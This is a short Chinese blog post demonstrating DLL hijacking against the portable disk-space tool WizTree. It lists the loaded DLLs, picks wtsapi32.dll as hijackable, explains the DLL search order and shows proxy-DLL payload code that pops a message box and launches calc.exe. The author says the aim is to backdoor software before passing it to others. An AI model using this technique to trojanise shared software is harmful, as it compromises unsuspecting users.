背景

       今天磁盘提示没空间了，找天哥要了一份检查磁盘大文件的工具WizTree 。到手之后发现他把整个安装目录都打包过来，解压后主程序能直接运行。像这种开箱即用的软件想看看有没有可以利用点，比如弹个窗留个后门啥的，到时候发给别人。

       目录内容挺简单的，locale文件夹是语言包。两个主程序，分别对应是32位和64位。

    运行一下，检查加载Dll列表，看看有没有可以利用的。

C:\Windows\System32\wow64log.dllD:\APP\WizTree\mpr.dllD:\APP\WizTree\oleacc.dllD:\APP\WizTree\winmm.dllD:\APP\WizTree\version.dllD:\APP\WizTree\netapi32.dllD:\APP\WizTree\winhttp.dllD:\APP\WizTree\SHFolder.dllD:\APP\WizTree\NETUTILS.DLLD:\APP\WizTree\OLEACCRC.DLLC:\Windows\SysWOW64\rpcss.dllD:\APP\WizTree\wtsapi32.dllD:\APP\WizTree\WINSTA.dllD:\APP\WizTree\olepro32.dllD:\APP\WizTree\URL.DLLD:\APP\WizTree\IEFRAME.dllD:\APP\WizTree\iertutil.dllD:\APP\WizTree\USERENV.dllD:\APP\WizTree\WKSCLI.DLLD:\APP\WizTree\PROPSYS.dllD:\APP\WizTree\profapi.dllD:\APP\WizTree\CFGMGR32.dllD:\APP\WizTree\edputil.dllD:\APP\WizTree\VAULTCLI.dllD:\APP\WizTree\urlmon.dllD:\APP\WizTree\srvcli.dllD:\APP\WizTree\SspiCli.dll

    发现存在可劫持Dll

wtsapi32.dll

    程序加载路径

D:\APP\WizTree\wtsapi32.dll

    主程序启动会加载路径当前路径下 wtsapi32.dll，但是当前目录下没有此Dll文件，根据Dll路径搜索目录顺序我们可以分析,主程序运行时加载wtsapi32.dll就是加载C:\Windows\System32\wtsapi32.dll 。
DLL路径搜索目录顺序
1. 进程对应的应用程序所在目录2. 系统目录（即%windir%system32）3. 16位系统目录（即%windir%system）
    制作恶意Dll，生成转发Dll代码（使用大佬工具一键生成）
    修改代码实现弹窗和打开计算器
// 弹窗MessageBox(NULL, L"恭喜你中招了", L" Dll 劫持", MB_OK);
 // 执行exe STARTUPINFO si = { sizeof(si) }; PROCESS_INFORMATION pi; CreateProcess(TEXT("C:\\Windows\\System32\\calc.exe"), NULL, NULL, NULL, false, 0, NULL, NULL, &si, &pi);
    至于实战咋利用大家就各自发挥了，我相信大家骚操作很多，这里我就不献丑了，免得大家笑话。用到的工具Github上有很多，大家可以自行去下载，这里就不放出来了。
    文章有点水，但是新鲜，就是今天上午的事。嘿嘿，主要是想提醒大家公众号换头像了！